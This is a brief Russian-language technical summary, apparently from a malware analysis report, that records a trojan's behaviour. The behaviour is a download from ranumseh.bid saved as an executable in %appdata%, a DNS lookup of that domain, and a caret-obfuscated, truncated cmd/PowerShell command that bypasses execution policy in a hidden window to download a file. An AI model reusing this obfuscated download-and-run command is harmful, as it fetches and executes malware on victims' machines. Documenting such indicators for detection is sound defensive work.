Техническая информация
- http://ranumseh.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWeRS^HELL^.eX^e ^-^EXeCU^TI^O^NpolIC^Y ^BY^pa^S^s^ -NOPro^FIlE ^-^wInd^ow^stY^L^e^ Hi^D^DE^n (^NeW-Obj^E^CT ^s^YSte^M^.^NEt.wE^bCl^i^ent^)^.^d^OwNloa^dF^Ile('http://ranu...
- DNS ASK ra###seh.bid
- '<SYSTEM32>\cmd.exe' /C "P^oWeRS^HELL^.eX^e ^-^EXeCU^TI^O^NpolIC^Y ^BY^pa^S^s^ -NOPro^FIlE ^-^wInd^ow^stY^L^e^ Hi^D^DE^n (^NeW-Obj^E^CT ^s^YSte^M^.^NEt.wE^bCl^i^ent^)^.^d^OwNloa^dF^Ile('http://ranu...' (со скрытым окном)